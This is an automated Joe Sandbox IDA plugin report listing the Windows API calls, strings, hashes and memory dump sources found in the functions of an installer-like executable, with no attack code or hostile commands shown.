• Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
• Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
• Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
• Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CloseOpen
• String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
• API String ID: 47109696-2631785700
• Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
• Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
• Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
• Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
• RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
Strings
• System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
• CSDVersion, xrefs: 00483BFC
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: CSDVersion$System\CurrentControlSet\Control\Windows
• API String ID: 3677997916-1910633163
• Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
• Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
• Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
• Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                                                            • API String ID: 1646373207-4063490227
                                                                                                                            • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                                                            • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                                                            • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                                                            • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                                                            • API String ID: 1646373207-260599015
                                                                                                                            • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                                            • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                                                            • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                                            • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: NotifyWinEvent$user32.dll
                                                                                                                            • API String ID: 1646373207-597752486
                                                                                                                            • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                                            • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                                                            • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                                            • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                                                            • API String ID: 1646373207-834958232
                                                                                                                            • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                                            • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                                                            • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                                            • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                                            • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                            • API String ID: 2238633743-2683653824
                                                                                                                            • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                                            • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                                                            • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                                            • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                                                            • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2066263336-0
                                                                                                                            • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                                            • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                                                            • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                                            • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
  • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
• GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CountErrorFileLastMoveTick
• String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
• API String ID: 2406187244-2685451598
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDesktopWindow.USER32 ref: 00413D46
• GetDesktopWindow.USER32 ref: 00413DFE
  • Part of subcall function 00418EC0: 6F5AC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
  • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
• SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
Similarity
• API ID: CursorDesktopWindow$Show
• String ID:
• API String ID: 2074268717-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
• LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
• LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
Similarity
• API ID: LoadString$FileMessageModuleName
• String ID:
• API String ID: 704749118-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
  • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
• InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
  • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
• IsRectEmpty.USER32(?), ref: 0044E953
• ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
Similarity
• API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
• String ID:
• API String ID: 855768636-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• OffsetRect.USER32(?,?,00000000), ref: 00495988
• OffsetRect.USER32(?,00000000,?), ref: 004959A3
• OffsetRect.USER32(?,?,00000000), ref: 004959BD
• OffsetRect.USER32(?,00000000,?), ref: 004959D8
Similarity
• API ID: OffsetRect
• String ID:
• API String ID: 177026234-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCursorPos.USER32 ref: 00417260
• SetCursor.USER32(00000000), ref: 004172A3
• GetLastActivePopup.USER32(?), ref: 004172CD
• GetForegroundWindow.USER32(?), ref: 004172D4
Similarity
• API ID: Cursor$ActiveForegroundLastPopupWindow
• String ID:
• API String ID: 1959210111-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
• MulDiv.KERNEL32(?,00000008,?), ref: 00495605
• MulDiv.KERNEL32(?,00000008,?), ref: 00495619
• MulDiv.KERNEL32(?,00000008,?), ref: 00495637
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                                                                            • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                                                                            • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4025006896-0
                                                                                                                            • Opcode ID: f5329bc195fe8fc87e14c8434c73e300a75752ca243df2a436e9fb21fcb0b6a1
                                                                                                                            • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                                                                            • Opcode Fuzzy Hash: f5329bc195fe8fc87e14c8434c73e300a75752ca243df2a436e9fb21fcb0b6a1
                                                                                                                            • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                                                            • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                                                            • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                                                            • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3473537107-0
                                                                                                                            • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                                                            • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                                                            • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                                                            • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                                                            Strings
                                                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                                                            • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                                                            • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                                            • API String ID: 1452528299-3038984924
                                                                                                                            • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                                            • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                                                            • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                                            • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                                                            Strings
                                                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                                                            • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                                                            • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
